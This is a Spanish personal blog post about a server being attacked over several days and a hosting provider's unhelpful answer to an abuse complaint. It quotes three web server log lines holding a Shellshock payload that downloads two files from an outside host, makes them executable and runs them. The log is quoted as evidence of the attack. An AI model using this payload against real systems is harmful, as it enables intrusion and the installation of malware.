Cuando los ataques se vuelven persistentes

Una cosa son los escaneos diarios y los ataques con herramientas automáticas (los de todos los días), pruebas de entrar por fuerza bruta etc… pero otra cosa distinta es cuando alguien de forma sistemática intenta petarte la maquina durante unos cuantos días seguidos … dedicándole horas.

En ese caso hay que tomar alguna acción distinta…

Creo que ya habia puesto algun log de este tio …

91.121.18.80 – – [18/Apr/2015:19:29:27 +0200] “GET /phppath/php HTTP/1.0” 404 492 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”
91.121.18.80 – – [18/Apr/2015:19:29:27 +0200] “GET /phppath/cgi_wrapper HTTP/1.0” 404 500 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”
91.121.18.80 – – [18/Apr/2015:19:29:27 +0200] “GET /cgi-bin/tools/tools.pl HTTP/1.0” 404 503 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”

El caso es que la ip es del mismo proveedor de alojamiento en el que tengo la maquina asi que intente por esa vía. Abrí un caso diciéndoles que alguien desde ips suyas estaba atacando … les puse unos cuantos logs y les pedí que tomaran cartas en el asunto.

Un par de días después me contestaron diciéndome … que mi tipo de instalación no incluye este tipo de servicio …. ¿WTF? … que si lo quería me cobraban a nosecuanto y que gracias por participar …

Hay que joderse … yo creo que ni se leyeron mi correo o eso o han entendido que me me habían petado la maquina y solicitaba su ayuda para limpiarla … o yo que se …

El caso es que han pasado de mi … y parece que los ataques también … pero en caso de que vuelvan cual es el siguiente paso … ¿La guardia Civil?.

Fuera de broma … no hubiese sido mas fácil contestar que ese no era el medio adecuado y que habia una web especifica para estas cosas??? (que es esta … https://abuse.ovh.net/index.rhtml).

En fin … a ver en que acaba todo esto … menos mal que todo lo que están probando esta parcheado …

Comments are closed.